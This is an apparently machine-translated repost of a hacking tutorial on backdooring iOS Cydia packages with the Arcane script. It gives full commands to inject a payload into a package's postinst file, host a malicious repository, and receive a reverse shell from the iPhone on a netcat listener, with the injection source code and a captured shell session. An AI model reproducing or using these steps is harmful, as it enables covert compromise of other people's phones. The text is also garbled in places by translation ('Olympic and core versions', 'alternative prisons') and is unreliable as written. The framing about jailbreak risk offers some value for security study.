قالب وردپرس درنا توس
Home / Tips and Tricks / How to embed payload in iPhone package with Arcane «Zero Byte :: WonderHowTo

How to embed payload in iPhone package with Arcane «Zero Byte :: WonderHowTo



It is a common misconception that iPhones are impervious to cyber attacks and “more secure” than Android. And when an iPhone is hacked, it’s almost impossible to say it happened.

Vulnerabilities in iOS are common and Apple tries to deal with them with every security update it releases. To get started, consider all the CVEs revealed in the past year. As we know, Apple issued over 180 notes so far in 2020, and probably many more that were not reported.

How do I hack into an iPhone?

Jailbreaks released over the past decade use a wide range of iOS exploits. Government agencies use undisclosed exploits to compromise with the iPhone every day. And take advantage of acquisition platforms that Zerodium offers up to $ 2 million for private information about iOS vulnerability.

That being said, this article will not show one magic simple button to access someone̵

7;s iPhone. It will give readers an idea of ​​what is possible with remote access to an iPhone and why it is dangerous to use Jailbreak archives.

Step 1: Jailbreak and iPhone

Following this guide requires a jailbroken iOS device. I am testing this attack on an iPhone 7 Plus with iOS 13.4.1, as well as an iPhone 7 with iOS 13.5. Jailbreaking of iOS devices was performed using the unc0ver method. You can also try alternative prisons, such as Checkra1n.

Step 2: Clone Arcane Repository

Arcane is a simple automation script designed to backdoor iOS packages and create the necessary resources to host Cydia archives. I created Arcane for this article to make the process quick and accessible for beginners. Before cloning the repository, make sure that the necessary dependencies are installed and updated.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3

[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]
Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
dpkg is already the newest version (1.19.7kali1).
python3 is already the newest version (3.8.2-3).
python3 set to manually installed.
The following additional packages will be installed:
   git-man (1:2.27.0-1)
   libbz2-1.0 (1.0.8-3)
Suggested packages:
   bzip2-doc (1.0.8-3)
   git-daemon-run (1:2.27.0-1)
   | git-daemon-sysvinit (1:2.27.0-1)
   git-doc (1:2.27.0-1)
   git-el (1:2.27.0-1)
   git-email (1:2.27.0-1)
   git-gui (1:2.27.0-1)
   gitk (1:2.27.0-1)
   gitweb (1:2.27.0-1)
   git-cvs (1:2.27.0-1)
   git-mediawiki (1:2.27.0-1)
   git-svn (1:2.27.0-1)
The following packages will be upgraded:
   bzip2 (1.0.8-2 => 1.0.8-3)
   git (1:2.26.2-1 => 1:2.27.0-1)
   git-man (1:2.26.2-1 => 1:2.27.0-1)
   libbz2-1.0 (1.0.8-2 => 1.0.8-3)
   netcat-traditional (1.10-41.1+b1 => 1.10-45)
5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.
Need to get 8,643 kB of archives.
After this operation, 2,424 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]
Fetched 8,643 kB in 2s (4,982 kB/s)
apt-listchanges: Reading changelogs...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...
Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...
Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...
Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...
Setting up libbz2-1.0:amd64 (1.0.8-3) ...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...
Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...
Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...
Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...
Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...
Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...
Setting up netcat-traditional (1.10-45) ...
Setting up bzip2 (1.0.8-3) ...
Setting up git-man (1:2.27.0-1) ...
Setting up git (1:2.27.0-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

When done, clone the Arcane archive.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

Recursive (-R) change the ownership to make the files available without root permissions.

~$ sudo chown $USER:$USER -R /opt/arcane/

Switch to the new / Opt / difficult to understand directory.

~$ cd /opt/arcane/

Raise the permissions for arcane.sh script to allow driving in Kali.

~/opt/arcane$ sudo chmod +x arcane.sh

To view available options, run Arcane with –help argument.

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost  --lport <1337>

  -i, --input   iOS package to backdoor
  -f, --file    file containing commands to exec (default: not required)
  -h, --lhost   local ip address for nc listener
  -p, --lport   local port for netcat listener (default: 1337)
  -c, --cydia   generate resources for apt/cydia repository (default: disabled)
  -n, --netcat  autostart netcat listener (default: disabled)
  -u, --udp     enable udp (default: tcp)
  -x, --noart   if you hate awesome ascii art (default: enabled)
      --help    you're looking at it

Step 3: Back door to an iOS package

There is a “sampler /” directory included in the Arcane archive that contains various packages compiled for the iOS architecture. Used ls command to display the directory contents.

~/opt/arcane$ ls -la samples/

total 400
drwxr-xr-x 2 root root   4096 Aug  4 11:32 .
drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..
-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

Taken from the official Bingner Cydia repo, all packages are useful when you follow along. For a complete list of available packages, use the command below to view the archive contents.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages'| awk -v i='https://apt.bingner.com/' '/debs//{print i $2}'

https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb
...
https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

Simply wget the package you choose. This review will use a package found in the “samples /” directory. Use the following secret command to backdoor package.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat

  ░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗
  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝
  ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░
  ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░
  ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗
  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝
                 v0.1 by @tokyoneon_

Below is a brief description of each argument, and you can watch the GIF below to see a package in action.

  • –input: This argument defines the file path to the desired package to the backdoor.
  • –lhost: Defined as the attacker’s IP address, lhost (or localhost) is a necessary argument. It tells the back door package where Kali is in the network. In this case, my Kali system is on 172.16.16.1.
  • –lport: Defined as an arbitrary value in 20001, the lport (or local port) tells the backdoor package where the Netcat listener port is.
  • –cydia: This argument instructs Arcane to generate the necessary files to host a Cydia archive.
  • –netcat: This argument tells Arcane to automatically start a Netcat listener with the given protocol and port.

When done, the Arcane terminal will not be used because the Netcat listener is waiting for an incoming connection.

Step 4: Host the storage resources

Open a new terminal in Kali and view the contents of / Tmp / Cydia directory. Notice the back door package.

~$ ls -la /tmp/cydia/

-rw-r--r--  1 root root    29 Jul 29 14:44 index.html
-rw-r--r--  1 root root   639 Jul 29 14:44 Packages
-rw-r--r--  1 root root   494 Jul 29 14:44 Packages.bz2
-rw-r--r--  1 root root   143 Jul 29 14:44 Release
-rw-r--r--  1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

Switch to the directory and start a simple one python3 server to make the files available to other devices (ie an iPhone) on the same network.

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 5: Add the archive to Cydia

Make sure your captured iOS device and Kali system are on the same Wi-Fi network. Then open the Cydia app and navigate to the “Sources” tab. Select the “Edit” button at the top right and then the “Add” button at the top left.

When prompted for a URL, enter the IP address of the Kali system that hosts the Python server. Be sure to delete httpS in the URL because Cydia will try to add it by default. Select “Add Source” to add it as an archive. Finally, select “Return to Cydia” to find the newly added archive.

Step 6: Install that rear door package

Select the repository to find the back door package. Make sure the Arcane terminal is still listening in Kali, then select “Install” and “Confirm” in Cydia. Cydia installs the package and runs the embedded payload.

How Arcane works

In the Arcane terminal, a successful command run will produce an “arcane>” scale prompt. Use sw_vers and you name to see the Olympic and core versions.

[░] /usr/bin/nc -v -l -p 20001
[░] starting netcat listener on port 20001 with tcp
listening on [any] 20001 ...
172.16.16.25: inverse host lookup failed: Unknown host
connect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_vers
ProductName:    iPhone OS
ProductVersion: 13.4.1
BuildVersion:   17E262
arcane> uname -a
Darwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwin
arcane>

Right now, various attacks after exploitation are possible, but let’s talk about what Arcane did. Some things happen in the GIF shown in step 3.

In Kali, decompress the whois package that has just been installed on your iOS device.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Use tree to see the directory contents. Notice the “DEBIAN” directory which contains a “control” and “postinst” file. Both files are important for how Cydia indexes packages and how commands run during installation.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

The “control” file (aka “control data”) contains values ​​that packet management tools like dpkg is used when installing packages. Arcane will either modify an existing control file or create it.

# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker 
Maintainer: $hacker ";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

It is possible to deliver scripts as part of a package when installing, upgrading or removing applications. Package maintenance scripts include preset, mail settings, prerm and postrm files. Arcane takes advantage of the “postinst” file to run commands during installation.

# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the bottom of the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

Readers are encouraged to review the Arcane source to better understand the underlined commands.

iOS after exploitation attacks

Apple’s iOS and macOS are the same; both operating systems are derivatives of FreeBSD, and there are overlaps in how the systems are installed, for example with startctl, keychain and the file system structure.

But readers will immediately notice wget, ifconfig, curl, netstat and other well-known commands are not available because iOS does not have these binaries installed by default. Keep your eyes open for Zero Byte for more, where I will discuss solutions for missed commands and attacks after exploitation in more detail.

Follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. And for questions and concerns, leave a comment or ping me on Twitter.

Want To Get Into The Gift Basket Business? Jump your career with hat hacking with our training package for premium ethical hacking 2020 from the new Null Byte store and get over 60 hours of training from professional ethical hacking.

Buy now (90% off)>

Cover photo, screenshots and GIFs of tokyoneon / Zero Replacement




Source link